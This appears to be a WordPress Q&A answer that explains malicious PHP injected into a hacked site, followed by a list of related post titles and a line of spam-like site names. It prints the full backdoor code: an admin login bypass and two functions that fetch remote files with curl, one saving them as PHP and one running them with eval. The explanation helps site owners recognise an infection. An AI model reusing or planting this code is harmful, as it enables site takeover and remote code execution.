Explanation of this hacked code

There are 3 main ‘functions’ of this code. The two lines check that pingnow and pass are defined and that pass is the correct value. pingnow is used later to switch between ‘functions’.

The first is run if the pingnow GET variable is login. It logs in the requesting user as the ‘admin’ user. This won’t work if there is not a user called ‘admin’.

if ($_GET['pingnow']== 'login'){
  $user_login = 'admin';
  $user = get_userdatabylogin($user_login);
  $user_id = $user->ID;
  wp_set_current_user($user_id, $user_login);         
  wp_set_auth_cookie($user_id);
  do_action('wp_login', $user_login);
}

The second part allows for uploading of defined files to your server. If the pingnow variable is exec then the script downloads the file and saves it on your server with the name of a random md5 hash. It then redirects the attacker to the script.

if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
  $ch = curl_init($_GET['file']);
  $fnm = md5(rand(0,100)).'.php';
  $fp = fopen($fnm, "w");
  curl_setopt($ch, CURLOPT_FILE, $fp);
  curl_setopt($ch, CURLOPT_HEADER, 0);
  curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  curl_exec($ch);
  curl_close($ch);
  fclose($fp);
  echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href="https://wordpress.stackexchange.com/questions/42400/$fnm";</SCRIPT>";
}

The third part allows for evaluation of remote php. It downloads a file and then evals it, running it on your server.

if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
  $ch = curl_init($_GET['file']);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_HEADER, 0);
  curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  $re = curl_exec($ch);
  curl_close($ch);
  eval($re);
}

Related Posts:

  1. Hide submenu wordpress?
  2. If hacker looked into all php file, can he make a harm to me?
  3. Custom row action on custom posts list page causes a wp_die?
  4. Turning a WP Site Into an iPhone/iPad App [closed]
  5. Add class to before_widget from within a custom widget
  6. How to get permalinks with category base working with sub-categories
  7. How would I compare and remove hacks to core?
  8. How to generate/update a XML sitemap without plugins?
  9. Brute force attack?
  10. Posts in multiple Categories different single.php
  11. Hacking TinyMCE for better usability (shortcodes and html)
  12. brute force attack even though it is limited by IP
  13. How can I assign post a specific ID on creation?
  14. Synchronizing Two WordPress Sites Content
  15. Intercept comment form submit/list by hook/filter
  16. Can’t stop hacker trying to get admin access in WordPress blog after trying many ways [closed]
  17. How to prevent bot or someone to modify any file automatically?
  18. How can I autopopulate titles in the media library?
  19. Attach to wp-login.php and xmlrpc.php
  20. WordPress login urls
  21. Why was my blog post inserted lot’s of ad links by others?
  22. Security issues with WP sites
  23. How do I specify more than one category?
  24. Is it dangerous to install unupdated plugins?
  25. Files automatically added
  26. Adding custom fields (post meta) before/during wp_insert_post()
  27. Change the ‘published on’ text?
  28. How to get “Widget Logic” plugin’s input value in a custom widget code (to display on the Widget admin page)
  29. Multiple wp_options tables to share content across installs
  30. Delete all one-word comments
  31. Add Download Button in prettyPhoto Plugin
  32. how to remove mandatory required fields in buddypress registration [closed]
  33. Using Fullscreenr with a wordpress blog – weird bug
  34. How can I safely hide the fact that my website runs on WordPress? [closed]
  35. How can I programmatically show a specific (template) page, like author.php?
  36. API for wp menu hacks
  37. Common single page template options
  38. What does this code do? (Injected code hacked)
  39. Some one is trying to hack my website, Need guidance [closed]
  40. Protect Passwords in wp_users with stronger protection than MD5
  41. WordPress Admin Login Custom Logo
  42. WordPress Phone Verification
  43. Trying to get variables in hacked category dropdown
  44. security issue in wordpress?
  45. how to activate a plugin inside a theme
  46. Can’t Find a “Most Popular Tags” Hack Anywhere [closed]
  47. malware undetectable by multiple scans
  48. How can I reference external attachments without breaking core WordPress files?
  49. Admin user lacks admin permissions after hack and can’t reinstate
  50. Custom Post Types and Removing Slugs – should we do it?
  51. wordpress admin security
  52. Want to modify a Plugin – Tweetily – Can I make it tweet a Custom Field instead of Post Title?
  53. why the posts queried from sql is more than those showed on the page?
  54. how to create a sub section in posts
  55. How to update custom field of a posts in a particular category
  56. How to insert category name above post title in a featured pages plugin?
  57. Hacked site using transient API?
  58. Being hacked. Is there a list of WordPress security holes I can check against?
  59. Pull ‘Popular Posts’ within specific timeframe
  60. db.php, is it a legit file [closed]
  61. Post not showing up sometimes on website
  62. Trying to see if page is category or single and displaying title with appropriate heading tag
  63. Is there any way to give all users access to one blog in a multisite network without using a plugin?
  64. child_of not working while searching
  65. How to stop repeated hack on header.php of custom theme? [closed]
  66. how woocommerce swatch color name when hovered or selected
  67. How to avoid conflict between plugin and its edited version?
  68. Windows 10 Printer that Sends to WordPress [closed]
  69. Is there any Reference of WordPress hook and hacks? [closed]
  70. How to Supply Console Logs Data into the WooCommerce Cart?

Leave a Comment

techhipbettruvabetnorabahisbahis forumutaraftarium24edueduseduedueduseduedusedueduedu